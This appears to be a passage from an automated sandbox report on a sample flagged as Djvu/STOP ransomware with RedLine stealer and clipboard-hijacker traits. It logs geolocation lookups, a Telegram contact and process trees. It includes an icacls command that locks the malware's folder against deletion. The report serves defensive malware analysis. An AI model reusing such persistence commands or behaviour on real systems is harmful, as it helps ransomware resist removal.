2022-11-29 23:22:09 UTC	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 23:22:09 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: application/json
2022-11-29 23:22:09 UTC	IN	Data Raw: 31 66 34 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 43 48 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 38 5c 75 30 34 33 32 5c 75 30 34 33 35 5c 75 30 34 33 39 5c 75 30 34 34 36 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 38 5c 75 30 34 33 32 5c 75 30 34 33 35 5c 75 30 34 33 39 5c 75 30 34 34 36 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 35 36 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 75 72 69 63 68 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 32 36 5c 75 30 34 Data Ascii: 1f4{"ip":"102.129.143.49","country_code":"CH","country":"Switzerland","country_rus":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0438\u044f","country_ua":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0456\u044f","region":"Zurich","region_rus":"\u0426\u04

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49703	162.0.217.254	443	C:\Users\user\Desktop\U59WtZz2Sg.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-29 23:22:16 UTC	1	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2022-11-29 23:22:16 UTC	1	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 23:22:16 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: application/json
2022-11-29 23:22:16 UTC	1	IN	Data Raw: 31 66 34 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 43 48 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 38 5c 75 30 34 33 32 5c 75 30 34 33 35 5c 75 30 34 33 39 5c 75 30 34 34 36 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 38 5c 75 30 34 33 32 5c 75 30 34 33 35 5c 75 30 34 33 39 5c 75 30 34 34 36 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 35 36 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 75 72 69 63 68 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 32 36 5c 75 30 34 Data Ascii: 1f4{"ip":"102.129.143.49","country_code":"CH","country":"Switzerland","country_rus":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0438\u044f","country_ua":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0456\u044f","region":"Zurich","region_rus":"\u0426\u04

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49709	162.0.217.254	443	C:\Users\user\Desktop\U59WtZz2Sg.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-29 23:22:31 UTC	2	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2022-11-29 23:22:31 UTC	2	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 23:22:31 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: application/json
2022-11-29 23:22:31 UTC	2	IN	Data Raw: 31 66 34 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 43 48 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 38 5c 75 30 34 33 32 5c 75 30 34 33 35 5c 75 30 34 33 39 5c 75 30 34 34 36 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 38 5c 75 30 34 33 32 5c 75 30 34 33 35 5c 75 30 34 33 39 5c 75 30 34 34 36 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 35 36 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 75 72 69 63 68 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 32 36 5c 75 30 34 Data Ascii: 1f4{"ip":"102.129.143.49","country_code":"CH","country":"Switzerland","country_rus":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0438\u044f","country_ua":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0456\u044f","region":"Zurich","region_rus":"\u0426\u04

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49707	149.154.167.99	443	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-29 23:22:31 UTC	2	OUT	GET /asifrazatg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 Host: t.me
2022-11-29 23:22:31 UTC	3	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 29 Nov 2022 23:22:31 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12375 Connection: close Set-Cookie: stel_ssid=f2442461deb9c785f0_4994600765663745481; expires=Wed, 30 Nov 2022 23:22:31 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2022-11-29 23:22:31 UTC	3	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 73 69 66 72 61 7a 61 74 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @asifrazatg</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49711	162.0.217.254	443	C:\Users\user\Desktop\U59WtZz2Sg.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-29 23:22:36 UTC	15	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2022-11-29 23:22:36 UTC	16	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 23:22:36 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: application/json
2022-11-29 23:22:36 UTC	16	IN	Data Raw: 31 66 34 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 43 48 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 38 5c 75 30 34 33 32 5c 75 30 34 33 35 5c 75 30 34 33 39 5c 75 30 34 34 36 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 38 5c 75 30 34 33 32 5c 75 30 34 33 35 5c 75 30 34 33 39 5c 75 30 34 34 36 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 35 36 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 75 72 69 63 68 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 32 36 5c 75 30 34 Data Ascii: 1f4{"ip":"102.129.143.49","country_code":"CH","country":"Switzerland","country_rus":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0438\u044f","country_ua":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0456\u044f","region":"Zurich","region_rus":"\u0426\u04

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49712	162.0.217.254	443	C:\Users\user\Desktop\U59WtZz2Sg.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-29 23:22:43 UTC	17	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2022-11-29 23:22:43 UTC	17	IN	HTTP/1.1 200 OK Date: Tue, 29 Nov 2022 23:22:43 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: application/json
2022-11-29 23:22:43 UTC	17	IN	Data Raw: 31 66 34 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 34 39 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 43 48 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 38 5c 75 30 34 33 32 5c 75 30 34 33 35 5c 75 30 34 33 39 5c 75 30 34 34 36 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 38 5c 75 30 34 34 66 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 38 5c 75 30 34 33 32 5c 75 30 34 33 35 5c 75 30 34 33 39 5c 75 30 34 34 36 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 35 36 5c 75 30 34 34 66 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 75 72 69 63 68 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 32 36 5c 75 30 34 Data Ascii: 1f4{"ip":"102.129.143.49","country_code":"CH","country":"Switzerland","country_rus":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0438\u044f","country_ua":"\u0428\u0432\u0435\u0439\u0446\u0430\u0440\u0456\u044f","region":"Zurich","region_rus":"\u0426\u04

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: U59WtZz2Sg.exePID: 5228, Parent PID: 3324

General

Target ID:	0
Start time:	00:22:04
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\U59WtZz2Sg.exe
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.304747895.000000000218B000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: U59WtZz2Sg.exePID: 3692, Parent PID: 5228

General

Target ID:	1
Start time:	00:22:07
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\U59WtZz2Sg.exe
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.301522504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: icacls.exePID: 1304, Parent PID: 3692

General

Target ID:	2
Start time:	00:22:10
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0x1190000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: U59WtZz2Sg.exePID: 1272, Parent PID: 3692

General

Target ID:	3
Start time:	00:22:11
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.318350093.00000000020FB000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: U59WtZz2Sg.exePID: 3184, Parent PID: 1084

General

Target ID:	4
Start time:	00:22:11
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.348844154.000000000210E000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: U59WtZz2Sg.exePID: 6132, Parent PID: 1272

General

Target ID:	5
Start time:	00:22:12
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.313991274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: U59WtZz2Sg.exePID: 2312, Parent PID: 3184

General

Target ID:	6
Start time:	00:22:15
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: 